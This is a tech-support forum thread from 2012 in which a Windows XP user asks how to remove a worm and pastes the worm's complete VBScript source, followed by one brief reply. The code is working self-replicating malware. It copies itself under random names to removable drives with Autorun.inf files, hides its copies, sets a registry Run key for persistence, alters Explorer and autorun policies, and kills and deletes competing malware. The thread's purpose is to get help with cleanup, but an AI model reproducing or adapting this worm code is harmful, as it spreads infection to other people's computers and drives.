Hidden files and folders keep showing

March 15, 2012 at 07:05:49
Specs: Windows XP
Hello,

i have some kind of worm that replicates itself into removable drives by creating a .vbs file having the code below. It shows all the hidden folders and files, the vbs file is created in c:\windows\ and has the form M*K*H*A* (the stars are replaced with random numbers)

Can anyone help me cleaning my PC from this worm

code for vbs file:

Dim InfectedFiles, InfectedDir
Dim FSO, Shell, To_File, Disk_Drive, Autorun, MF, MKH_RunDir, WinDir, in_WinDir, Text, MKHSource, Temp
Dim InF, RegPath, RndName, FilNam


InfectedDir = Array ("C:\", "C:\Windows\", "C:\Windows\System32\", "All Drivers")

' Array for the infected files
' InfectedFile, InfectedDirID, InfectedRegKey, Infectedram, "Family"
InfectedFiles = Array ("2IFETRI.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"3WCXX91.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"4SV.EXE" , 3, "4sv" , "4SV.EXE" , "Generic VB.c" _
,"4SV.EXE" , 2, "4sv" , "4SV.EXE" , "Generic VB.c" _
,"AMVO.EXE" , 2, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"AMVO0.DLL" , 2, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"ASC3360PR.SCR", 3, "0" , "0" , "W32-Sality.gen" _
,"ASC3360PR.PIF", 3, "0" , "0" , "W32-Sality.gen" _
,"ASC3360PR.EXE", 3, "0" , "0" , "W32-Sality.gen" _
,"AVP.EXE" , 3, "avpa" , "AVPO.EXE" , "PWS-Gamania.gen.a" _
,"AVPO.EXE" , 2, "avpa" , "AVPO.EXE" , "PWS-Gamania.gen.a" _
,"AVPO0.DLL" , 2, "avpa" , "AVPO.EXE" , "PWS-Gamania.gen.a" _
,"AWDA2.EXE" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"BGOTRTU0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"CAPP.PIF" , 3, "0" , "0" , "0" _
,"CKTTQN.PIF" , 3, "0" , "0" , "0" _
,"CKVO.EXE" , 2, "ckva" , "0" , "PWS-Gamania.gen.a" _
,"CKVO0.DLL" , 2, "ckva" , "0" , "PWS-Gamania.gen.a" _
,"COPY.EXE" , 3, "sqlserv" , "0" , "W32/SqlCop.worm" _
,"CTFM0N.EXE" , 2, "" , "CTFM0N.EXE" , "Backdoor - CEP" _
,"DSETWEM0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"EJ10FKDO.BAT" , 3, "0" , "0" , "Generic PWS.ak" _
,"GODERT0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"GSIT.PIF" , 3, "0" , "0" , "0" _
,"HELP.EXE.TMP" , 2, "avpa" , "HELP.EXE.TMP", "W32/Sality.*" _
,"HNDCBM.PIF" , 3, "0" , "0" , "0" _
,"HOST.EXE" , 3, "0" , "0" , "0" _
,"HVLWLV.EXE" , 3, "0" , "0" , "0" _
,"IMAGE.EXE" , 2, "My App" , "IMAGE.EXE" , "0" _
,"IMAGE.EXE" , 3, "My App" , "IMAGE.EXE" , "0" _
,"KAMSOFT.EXE" , 2, "kamsoft" , "0" , "0" _
,"KAV.EXE" , 3, "kava" , "0" , "PWS-Gamania.gen.a" _
,"KAVO.EXE" , 2, "kava" , "0" , "PWS-Gamania.gen.a" _
,"KAVO0.DLL" , 2, "kava" , "0" , "PWS-Gamania.gen.a" _
,"L1.COM" , 3, "kava" , "0" , "PWS-Gamania.gen.a" _
,"LHGJYIT0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"MMVO.EXE" , 2, "mmva" , "0" , "PWS-Gamania.gen.a" _
,"MMVO0.EXE" , 2, "mmva" , "0" , "PWS-Gamania.gen.a" _
,"N1DE2ECT.COM" , 0, "0" , "0" , "0" _
,"N68MQCRA.EXE" , 3, "0" , "0" , "0" _
,"NAR.VBS" , 3, "nar" , "0" , "VBS/Autorun.worm.k" _
,"NASY.EXE" , 3, "0" , "0" , "0" _
,"NIDE2ECT.COM" , 0, "0" , "0" , "0" _
,"NLDE2ECT.COM" , 0, "0" , "0" , "0" _
,"NMDFGDS0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "Generic PWS.ak" _
,"NTDEIECT.COM" , 0, "0" , "0" , "0" _
,"NTDELECT.COM" , 0, "0" , "0" , "0" _
,"O1.COM" , 3, "0" , "SCVVHSOT.EXE", "W32/YahLover.worm.gen" _
,"OLHRWEF.EXE" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"OPTYHWW0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"PYTDFSE0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"QALA.EXE" , 3, "0" , "0" , "0" _
,"QPHDIN.COM" , 3, "cdoosoft" , "CCSVCHST.EXE", "0" _
,"QYQPLS.PIF" , 3, "0" , "0" , "0" _
,"RAV.EXE" , 3, "rava" , "0" , "PWS-Gamania.gen.a" _
,"RB.EXE" , 1, "kava" , "0" , "PWS-Gamania.gen.a" _
,"SCVVHSOT.EXE" , 2, "0" , "SCVVHSOT.EXE", "W32/YahLover.worm.gen" _
,"SCVVHSOT.EXE" , 3, "0" , "SCVVHSOT.EXE", "W32/YahLover.worm.gen" _
,"TAVO.EXE" , 2, "tava" , "0" , "PWS-Gamania.gen.a" _
,"TAVO1.DLL" , 2, "tava" , "0" , "PWS-Gamania.gen.a" _
,"TJJQTEJQ.BAT" , 3, "0" , "0" , "Generic PWS.ak" _
,"TT.EXE" , 1, "kava" , "0" , "PWS-Gamania.gen.a" _
,"URET463.EXE" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"URRETND.EXE" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"USERINIT.EXE" , 3, "0" , "0" , "W32/Virut.n.gen" _
,"UWEYIWE0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"WINDOWSAV.EXE", 3, "" , "CTFM0N.EXE" , "Backdoor - CEP" _
,"X.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"XMG.EXE" , 1, "kava" , "0" , "PWS-Gamania.gen.a" _
,"XN1I9X.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"XYJOWL.PIF" , 3, "0" , "0" , "0" _
)
On Error Resume Next
RegPath = "Software\Microsoft\Windows\CurrentVersion\Run\"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set Shell = CreateObject("Wscript.shell")

'Clone himself into any removable disk
in_WinDir = 2
Set MF = FSO.GetFile(Wscript.ScriptFullName)
FilNam = WScript.ScriptName
MKH_RunDir = FSO.GetParentFolderName(MF)
Set WinDir = FSO.GetSpecialFolder(0)

'---Open the drive just like autorun would if it is not running from the windows directory--->
If (FSO.GetAbsolutePathName(WinDir) <> FSO.GetAbsolutePathName(MKH_RunDir)) Then
Shell.Run(WinDir & "\Explorer.exe /root," & MKH_RunDir)
in_WinDir = 0
Else
in_WinDir = 1
End If

'---If file is in windir and not running from windir then write the registry run value and exit--->
If (FSO.FileExists(WinDir & "\" & FilNam) = 0 Or in_WinDir = 1) Then
Autorun = "[autorun]" & VBCrLf & "ShellExecute = WScript.exe" & FilNam
Set Text = MF.OpenAsTextStream(1,-2)
Do While Not Text.AtEndOfStream
MKHSource = MKHSource & Text.ReadLine
MKHSource = MKHSource & VBCrLf
Loop
If (in_WinDir = 0) Then
Set To_File = FSO.GetFile(WinDir & "\" & FilNam)
To_File.Attributes = 32
Set To_File = FSO.CreateTextFile(WinDir & "\" & FilNam, 2, True)
To_File.Write MKHSource
To_File.Close
Set To_File = FSO.GetFile(WinDir & "\" & FilNam)
To_File.Attributes = 39
End If
'Generate the Script name
Randomize
RndName = "M" & Int((9 * Rnd) + 1) _
& "K" & Int((9 * Rnd) + 1) _
& "H" & Int((9 * Rnd) + 1) _
& "A" & Int((9 * Rnd) + 1) _
& ".vbs"
Autorun = "[autorun]" & VBCrLf & "ShellExecute = WScript.exe " & RndName
Do While (in_WinDir = 1)
'---Add Script and autorun to each Removable disk drive excluding floppies--->
For Each Disk_Drive in FSO.Drives
If (Disk_Drive.DriveType = 1) Then
Set To_File = FSO.GetFile(Disk_Drive.Path & "\" & RndName)
To_File.Attributes = 32
Set To_File = FSO.CreateTextFile(Disk_Drive.Path & "\" & RndName, 2, True)
To_File.Write MKHSource
To_File.Close
Set To_File = FSO.GetFile(Disk_Drive.Path & "\" & RndName)
To_File.Attributes = 39
Set To_File = FSO.GetFile(Disk_Drive.Path & "\Autorun.inf")
To_File.Attributes = 32
Set To_File = FSO.CreateTextFile(Disk_Drive.Path & "\Autorun.inf", 2, True)
To_File.Write Autorun
To_File.Close
Set To_File = FSO.GetFile(Disk_Drive.Path & "\Autorun.inf")
To_File.Attributes = 39
End If
Next
'---Edit the registry to disable autorun--->
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & "MKH", WinDir & "\" & FilNam, "REG_SZ"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\AutoRun",0,"REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun",255,"REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
Shell.RegWrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
'---Edit the registry to disable hidden file properties
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue", "2", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue", "2", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue", "1", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue", "2", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\CheckedValue", "0", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\DefaultValue", "0", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\Type", "Group", "REG_SZ"
'---Edit the registry to Enable Folder Options And RegEdit and Task Manager
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "0", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "0", "REG_DWORD"

'Clean the worms from the computer
For InF = 0 To UBound(InfectedFiles) Step 5
If (InfectedFiles(InF + 1) < 3) Then
If (FSO.FileExists(InfectedDir(InfectedFiles(InF + 1)) & InfectedFiles(InF)) = True) Then
nret = Shell.Run("TaskKill.exe /IM " & InfectedFiles(InF + 3),0,True)
If (InfectedFiles(InF + 2) <> "0") Then
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
Shell.RegWrite "HKEY_CURRENT_USER\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
End If
Set To_File = FSO.GetFile(InfectedDir(InfectedFiles(InF + 1)) & InfectedFiles(InF))
To_File.Attributes = 32
To_File.Close
nret = Shell.Run("Cmd.exe /C DEL " & InfectedDir(InfectedFiles(InF + 1)) & InfectedFiles(InF), 0, True)

End If
Else
For Each Disk_Drive In FSO.Drives
If ((Disk_Drive.DriveType = 1 Or Disk_Drive.DriveType = 2) And Disk_Drive.IsReady) Then
If (FSO.FileExists(Disk_Drive.Path & "\" & InfectedFiles(InF)) = True) Then
nret = Shell.Run("TaskKill.exe /IM " & InfectedFiles(InF + 3),0,True)
If (InfectedFiles(InF + 2) <> "0") Then
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
Shell.RegWrite "HKEY_CURRENT_USER\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
End If
Set To_File = FSO.GetFile(Disk_Drive.Path & "\" & InfectedFiles(InF))
To_File.Attributes = 32
To_File.Close
nret = Shell.Run("Cmd.exe /C DEL " & Disk_Drive.Path & "\" & InfectedFiles(InF), 0, True)
End If
End If
Next
End If
Next
WScript.Sleep(60000)
Loop
'---Run the instance in the windows directory so a thumb drive is not stuck in use and the process continues--->
If (FSO.GetAbsolutePathName(WinDir) <> FSO.GetAbsolutePathName(MKH_RunDir)) Then
Temp = WinDir & "\" & FilNam
Shell.Run Temp, 1, 0
End If
End If
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & "MKH", WinDir & "\" & FilNam, "REG_SZ"


See More: Hidden files and folders keep showing

Report •


#1
March 15, 2012 at 22:54:33
http://home.mcafee.com/virusinfo/vi...

Basically any decent up-to-date AV Software should be able to remove, according to links found by Googling

Also please do not post log files unless requested.

Googling is quicker than waiting for an answer....


Report •
Related Solutions


Ask Question